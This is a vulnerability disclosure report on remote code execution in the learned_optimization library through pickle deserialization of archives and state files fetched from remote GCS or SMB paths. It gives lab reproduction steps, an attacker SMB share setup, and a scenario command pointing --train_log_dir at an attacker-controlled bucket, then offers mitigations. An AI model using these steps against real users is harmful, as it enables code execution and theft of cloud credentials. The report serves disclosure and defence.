learned_optimization v0.0.1 RCE via Insecure Deserialization

Below is one (1) way to reproduce RCE in learned_optimization using an attacker-controlled SMB share. No third party needs local access to modify files on the victim machine: the code executes while a file fetched from the share is being deserialized.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: This vulnerability was verified and reported against version 0.0.1. Other versions may also be susceptible to the same insecure deserialization vector.

Introduction

learned_optimization is an open-source research library developed by Google for training and evaluating learned optimizers using JAX. Its primary purpose is to automate the design of optimization algorithms (like SGD or Adam) by using machine learning itself to meta-learn optimization rules. This matters for AI research because it can significantly speed up the training of neural networks, optimize hyperparameter searches, and run meta-learning experiments at massive scale on cloud infrastructure and TPU/GPU pods.

Vulnerability description

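The read_npz function loads baseline results and archives. It opens the path with filesystem.file_open, which routes gs:// paths through tf.io.gfile and every other path, including Windows UNC paths such as \\server\share\file, through the built-in open(). It then passes the bytes to numpy.load with allow_pickle=True. numpy.load returns a lazy NpzFile, but the dict comprehension reads every member, so any object array in the archive is unpickled immediately and a crafted pickle can execute arbitrary Python code.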

The vulnerable code in `learned_optimization/baselines/utils.py`:

import io
from typing import Any, Mapping, Optional
import numpy as onp
from learned_optimization import filesystem

def read_npz(path: str) -> Optional[Mapping[str, Any]]:
  """Read a numpyz file from the `path`."""
  with filesystem.file_open(path, "rb") as f:
    content = f.read()
  io_buffer = io.BytesIO(content)
  try:
    # INSECURE: numpy.load with allow_pickle=True on untrusted data
    return {k: v for k, v in onp.load(io_buffer, allow_pickle=True).items()}
  # ... (except clause omitted from this excerpt)
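For contrast, below is a minimal sketch of the same loader with allow_pickle=False. It assumes baseline archives only need to hold plain numeric arrays. read_npz_safe is a hypothetical name, not part of learned_optimization, and it takes the raw bytes (what read_npz gets from filesystem.file_open) so it can be tried without a filesystem. With pickling disabled, NumPy raises ValueError on an object array instead of unpickling it.

```python
import io
from typing import Any, Mapping

import numpy as onp


def read_npz_safe(content: bytes) -> Mapping[str, Any]:
  """Hypothetical hardened variant of read_npz that refuses pickled members."""
  # allow_pickle=False makes NumPy raise ValueError as soon as a member with an
  # object dtype is accessed, before any pickle data is deserialized.
  with onp.load(io.BytesIO(content), allow_pickle=False) as archive:
    return {k: archive[k] for k in archive.files}


# Two in-memory archives: one purely numeric, one containing an object array.
numeric = io.BytesIO()
onp.savez(numeric, losses=onp.linspace(1.0, 0.1, 4))
objects = io.BytesIO()
onp.savez(objects, meta=onp.array([{"note": "not plain data"}], dtype=object))

print(read_npz_safe(numeric.getvalue())["losses"].shape)  # (4,)
try:
  read_npz_safe(objects.getvalue())
except ValueError as err:
  print("rejected:", err)
```

The trade-off is that archives which legitimately store Python objects stop loading. That is intentional: such data would need to move to an explicit, non-executable format.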

Technical Impact Analysis

Project Purpose & Context

learned_optimization is designed for meta-learning research at scale, where researchers meta-train optimizers on a wide variety of tasks. It handles complex state serialization for distributed training and routes file access through a shared filesystem abstraction so data moves seamlessly between local and cloud storage.

Platform & Deployment Environment

Google Cloud TPU/GPU Pods: Large-scale distributed meta-training.
Research Workstations & Colab: For rapid prototyping and analysis of meta-learning results.
MLOps & Research Pipelines: Integrated into workflows that exchange model checkpoints and baseline archives across Google Cloud Storage (GCS) buckets.

Comprehensive Risk Assessment

The vulnerability is rated Critical. Because RCE can be triggered through network locations (UNC paths and GCS URIs), the attacker never needs a foothold inside the victim's local trust boundary. These tools orchestrate expensive compute resources, so a compromise can lead to large-scale theft of compute, exfiltration of high-value research IP, and lateral movement within research VPCs that host sensitive datasets.

Attack Scenario

Who would want to exploit this vulnerability?

Adversaries targeting AI/ML research divisions, industrial competitors looking for optimized optimizer architectures, or malicious actors seeking to hijack high-performance compute nodes (TPU/GPU pods) for cryptomining or as nodes in a botnet.

For what gain?

The objectives include exfiltration of proprietary research (model architectures and weights), harvesting of cloud credentials (GCP/IAM) from environment variables, and achieving long-term persistence within high-compute research infrastructure.

In what way?

Attackers can leverage several remote vectors:

Poisoning Baseline Archives: Getting the victim to set LOPT_BASELINE_ARCHIVES_DIR to a URI or UNC path that points to an attacker-controlled SMB share or GCS bucket.
Reproduction Metadata Injection: Suggesting a malicious --train_log_dir in reproducibility guides for new research papers, causing the victim's PopulationController to load a malicious state file.
Distributed RPC Manipulation: Targeting Courier RPC interfaces, which are often deployed without authentication in research environments, to inject malicious task configurations or weights into a running training job.

Reproduction steps

On the Raspberry Pi (attacker)

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $

Shared Resource Configuration (SMB):

1. Install Samba: sudo apt update && sudo apt install samba samba-common-bin -y
2. Prepare the attack directory:

mkdir ~/lab_attack
chmod 755 /home/kw0  # lets Samba traverse the home directory
chmod -R 777 ~/lab_attack

3. Configure Samba: Add to the end of /etc/samba/smb.conf:

[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes

Restart Samba so the share is published: sudo systemctl restart smbd

4. Payload Generation on the Raspberry:
Run the exploit.py script to generate the adam_baseline.npz file directly in the shared directory (/home/kw0/lab_attack):

python exploit.py

On Windows (victim)

PS L:\Pickle-RCE-Finder\learned_optimization> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
PS L:\Pickle-RCE-Finder\learned_optimization>

Technical Requirements:

Create a Python virtual environment: python -m venv .venv
Activate it: .venv\Scripts\activate
Install the dependencies from requirements_rce.txt:
The project's default requirements.txt is outdated and fails to install, so a custom requirements_rce.txt with corrected package dependencies was used instead.

pip install -r requirements_rce.txt

Exploit Execution:

1. Point the LOPT_BASELINE_ARCHIVES_DIR environment variable at the SMB share:

$env:LOPT_BASELINE_ARCHIVES_DIR = "\\192.168.1.90\lab_share\"

2. Trigger deserialization by loading the baseline archive:

python -c "from learned_optimization.baselines import utils; utils.load_archive('mnist', 'adam_baseline')"

Other attacker-controllable RCE vectors in `learned_optimization`

1. Vector #1: Cloud Storage Abstraction (The Proxy Bridge)

The root cause lies in the filesystem.py module, which acts as a global wrapper for all file operations in the library.

File: learned_optimization/filesystem.py
Mechanism: The _path_on_gcp function detects the gs:// prefix, and for such paths file_open switches from the built-in open() to tensorflow.io.gfile.GFile. Every other path, including a Windows UNC path, goes to open() unchanged.

import tensorflow as tf

def _path_on_gcp(path: str) -> bool:
  prefixes = ["gs://"]
  return any([path.startswith(p) for p in prefixes])

def file_open(path: str, mode: str):
  if _path_on_gcp(path):
    return tf.io.gfile.GFile(path, mode)  # gs:// paths go through TensorFlow
  return open(path, mode)  # everything else, including UNC paths, uses open()

WARNING

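This abstraction means that any code expecting a "file path" also accepts a remote location, which turns every path that reaches a deserialization sink into an SSRF-to-Deserialization surface. An attacker does not need to modify local files. They only need to supply a gs:// URI, or on Windows a UNC path (which the built-in open() resolves over SMB), that the application then reads as if it were a local file.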

2. Vector #2: Population Based Training (Critical Sink)

The highest-impact RCE vector identified is in the PopulationController's state management.

File: learned_optimization/population/population.py
Method: load_state()
Sink: pickle.loads(content)
Path Control: The path is constructed using self._log_dir.

The PopulationController is initialized with a log_dir provided by the setup_experiment module. In distributed training, this log_dir (passed via the --train_log_dir CLI flag) can be set to any URI. When load_state() is called, it reads population.state from that location (a remote fetch when log_dir is a bucket) and passes the bytes to pickle.loads, which executes any embedded payload during deserialization.
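If pickle cannot be removed from load_state() right away, the Python pickle documentation ("Restricting Globals") describes a stopgap: subclass pickle.Unpickler and override find_class so that only an explicit allowlist of globals can be resolved. The sketch below is a minimal, hypothetical version. RestrictedUnpickler, ALLOWED_GLOBALS, and the sample state are illustrative names, and a real allowlist would have to match whatever types population.state actually contains, which this report does not establish.

```python
import io
import os
import pickle
from collections import OrderedDict

# Hypothetical allowlist: the only (module, name) globals a state file may use.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
  """Unpickler that refuses to resolve any global outside ALLOWED_GLOBALS."""

  def find_class(self, module: str, name: str):
    if (module, name) in ALLOWED_GLOBALS:
      return super().find_class(module, name)
    raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(content: bytes):
  return RestrictedUnpickler(io.BytesIO(content)).load()


# Plain containers and allowlisted classes load normally.
state = OrderedDict(step=10, hparams={"lr": 1e-3})
print(restricted_loads(pickle.dumps(state)))

# A pickle that merely references os.system is rejected in find_class,
# before the function could ever be called.
try:
  restricted_loads(pickle.dumps(os.system))
except pickle.UnpicklingError as err:
  print("rejected:", err)
```

This narrows the attack surface but remains weaker than moving population state to a non-executable format, because any allowlisted class can still be misused.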

3. Vector #3: Baseline Results & NumPy Archives

The project includes utilities for loading precomputed results and archives, which are common entry points for researchers.

File: learned_optimization/baselines/utils.py
Function: read_npz(path)
Sink: numpy.load(io_buffer, allow_pickle=True)
Control Vector: LOPT_BASELINE_ARCHIVES_DIR (Environment Variable)

If LOPT_BASELINE_ARCHIVES_DIR points to a publicly writable bucket (e.g., gs://public-research-archive/) or any other attacker-controlled location, an attacker can supply malicious .npz files. These are Zip archives of .npy members, and any member with an object dtype is stored as a pickle. When a user tries to "load a baseline" to compare results, the RCE is triggered remotely.
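On the defensive side, an .npz is an ordinary Zip archive, so a downloaded baseline archive can be audited without deserializing anything. The audit reads each member's .npy header and checks whether its dtype can hold Python objects. The sketch uses numpy.lib.format.read_magic and the read_array_header_* readers. find_object_members is a hypothetical helper, and it only handles .npy format versions 1.0 and 2.0. It raises on anything else rather than guessing.

```python
import io
import zipfile
from typing import BinaryIO, List

import numpy as onp
from numpy.lib import format as npy_format


def find_object_members(archive: BinaryIO) -> List[str]:
  """Hypothetical audit: names of .npz members whose dtype holds objects.

  Only the .npy headers are parsed; no array data is read and nothing is
  unpickled.
  """
  flagged = []
  with zipfile.ZipFile(archive) as zf:
    for name in zf.namelist():
      if not name.endswith(".npy"):
        continue
      with zf.open(name) as member:
        version = npy_format.read_magic(member)
        if version == (1, 0):
          _, _, dtype = npy_format.read_array_header_1_0(member)
        elif version == (2, 0):
          _, _, dtype = npy_format.read_array_header_2_0(member)
        else:
          raise ValueError(f"{name}: unsupported .npy version {version}")
      if dtype.hasobject:  # object arrays are stored as pickles
        flagged.append(name[: -len(".npy")])
  return flagged


buf = io.BytesIO()
onp.savez(buf, weights=onp.arange(3.0),
          meta=onp.array([{"a": 1}], dtype=object))
buf.seek(0)
print(find_object_members(buf))  # ['meta']
```

An archive that should contain only numeric results should produce an empty list. Any flagged member is a reason to refuse the file.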

4. Vector #4: Distributed Training RPC (Courier Surface)

The project relies on Google's Courier for RPC between the Learner and Workers.

File: learned_optimization/distributed.py
Protocol: Courier RPC
Exposure: AsyncLearner and SyncLearner bind service methods to open ports.

Courier deployments in research environments often lack robust authentication. The put_grads and get_weights methods exchange complex Python objects. If the transport serializes them with pickle (common in JAX/Flax research code for speed), an attacker who can reach the Learner's port could submit a malicious "gradient" object that executes code as soon as the Learner deserializes it for access or aggregation.
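Whatever the transport, one general mitigation is to authenticate the serialized bytes before they reach any deserializer. The sketch below uses Python's hmac module with a shared key. It is not Courier's API: the framing (a 32-byte HMAC-SHA256 tag prepended to the payload), the key distribution, and the names sign and verify_and_strip are assumptions for illustration. Only after verification would the payload be handed to a decoder, preferably one that is not pickle.

```python
import hashlib
import hmac
import secrets

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def sign(key: bytes, payload: bytes) -> bytes:
  """Prepend an HMAC-SHA256 tag to the serialized payload."""
  return hmac.new(key, payload, hashlib.sha256).digest() + payload


def verify_and_strip(key: bytes, message: bytes) -> bytes:
  """Return the payload only if its tag matches; raise otherwise."""
  tag, payload = message[:TAG_LEN], message[TAG_LEN:]
  expected = hmac.new(key, payload, hashlib.sha256).digest()
  if not hmac.compare_digest(tag, expected):  # constant-time comparison
    raise PermissionError("message failed authentication; not deserializing")
  return payload


key = secrets.token_bytes(32)  # assumed to be shared out of band by all peers
msg = sign(key, b"serialized gradients")
assert verify_and_strip(key, msg) == b"serialized gradients"

forged = sign(secrets.token_bytes(32), b"attacker bytes")  # wrong key
try:
  verify_and_strip(key, forged)
except PermissionError as err:
  print(err)
```

This only proves the sender holds the key. It does not prevent replay, and it does not make pickle safe against a compromised worker.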

Exploit Scenario: The "Public Log Dir" Trap

An attacker publishes a "reproducibility" guide for a new optimization technique, suggesting users run the trainer pointing to their "results" bucket for initialization:

python run_outer_trainer.py --train_log_dir=gs://attacker-research-data/experiment_v1/

The application initializes setup_experiment.
PopulationController is created with log_dir=gs://attacker-research-data/experiment_v1/.
load_state() fetches gs://attacker-research-data/experiment_v1/population.state.
Result: Immediate RCE in the context of the user running the training script, with access to their GCP credentials/environment.

Executive Summary: RCE via Insecure Pickle Deserialization in `learned_optimization`

This report documents multiple critical Remote Code Execution (RCE) vulnerabilities in Google's learned_optimization library. They are caused by passing untrusted data to pickle and numpy.load(..., allow_pickle=True) across filesystem boundaries, with a further potential vector at the RPC boundary.

Root Cause: The library provides a filesystem.file_open abstraction that transparently accepts remote locations: gs:// URIs via tf.io.gfile, and SMB/UNC paths via the built-in open() on Windows. It passes data retrieved from these untrusted locations directly to sinks like pickle.loads or numpy.load(allow_pickle=True).
Exploitation Mechanism: Attackers can control the source path of baseline archives or log directories via environment variables (LOPT_BASELINE_ARCHIVES_DIR) or CLI flags (--train_log_dir). By pointing these to attacker-controlled remote storage (GCS/SMB), the application automatically fetches and deserializes malicious payloads, triggering RCE in the victim's environment.

Analysis of Scope and Security Implications

This vulnerability is of critical severity, as it targets the foundational state-management and distributed-training mechanisms of the library.

1. Infection Scenarios

Baseline Archive Poisoning: Adversaries can provide malicious URIs for LOPT_BASELINE_ARCHIVES_DIR, leading to RCE when researchers attempt to load pre-computed baseline archives for comparison.
Reproducibility Metadata Injection: Researchers following guides that suggest an attacker-supplied --train_log_dir will have their PopulationController load a malicious pickle payload as its state, resulting in code execution with the privileges of the user running the trainer.
Distributed RPC Manipulation: Courier RPC endpoints are often deployed without robust authentication. If the transport uses pickle, attackers who can reach the Learner's port can submit malicious objects that execute code during gradient aggregation.

2. Factors Exacerbating Risk

Global Filesystem Wrapper: The filesystem.py module creates an "SSRF-to-Deserialization" surface, where any part of the application expecting a local file path can be coerced into fetching and executing code from an external network source.
Targeting High-Value Infrastructure: Because the library is designed for large-scale GPU/TPU training, successful exploitation grants the attacker persistent access to high-performance compute resources, valuable intellectual property, and cloud environment credentials.

Conclusion and Recommendation

This is a critical-severity vulnerability. The systemic reliance on insecure deserialization sinks, combined with the library's ability to seamlessly traverse network boundaries, creates a massive attack surface for MLOps and research pipelines.

Suggested actions for the development team:

Remove Pickle: Replace all uses of pickle.load/pickle.loads and allow_pickle=True with safe, non-executable data formats (e.g., Protobuf or JSON, or .npz archives of numeric arrays loaded with allow_pickle=False).
Restrict URI Schemes: Harden the filesystem abstraction to explicitly disable remote protocol support (e.g., GCS/SMB) for sensitive loading operations unless the fetched content is cryptographically verified.
Authenticate RPCs: Implement mandatory authentication for all Courier RPC service methods to prevent unauthorized injection of serialized objects during distributed training.
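The URI-restriction recommendation can be illustrated with a stricter wrapper that only opens files resolving under an explicitly trusted local directory. gs:// URIs, UNC shares, and paths outside the root are refused before any bytes reach a deserializer. open_trusted and the trusted root are hypothetical. The sketch uses an allowlist of locations instead of a denylist of schemes so that new remote path forms cannot slip through. Path.is_relative_to requires Python 3.9 or later.

```python
import tempfile
from pathlib import Path
from typing import IO


def open_trusted(path: str, mode: str, trusted_root: Path) -> IO:
  """Hypothetical replacement for file_open on sensitive load paths.

  Refuses URIs and any path that does not resolve inside trusted_root.
  """
  if "://" in path:
    raise PermissionError(f"remote URI refused: {path}")
  root = trusted_root.resolve()
  resolved = Path(path).resolve()  # follows symlinks and ".." components
  if not resolved.is_relative_to(root):
    raise PermissionError(f"{resolved} is outside trusted root {root}")
  return open(resolved, mode)


with tempfile.TemporaryDirectory() as tmp:
  root = Path(tmp)
  (root / "adam_baseline.npz").write_bytes(b"placeholder")
  with open_trusted(str(root / "adam_baseline.npz"), "rb", root) as f:
    print(f.read())  # b'placeholder'
  for bad in ["gs://bucket/adam_baseline.npz", str(root / ".." / "elsewhere")]:
    try:
      open_trusted(bad, "rb", root)
    except PermissionError as err:
      print("refused:", err)
```

A UNC path such as \\192.168.1.90\lab_share\adam_baseline.npz resolves outside any local root and is refused the same way.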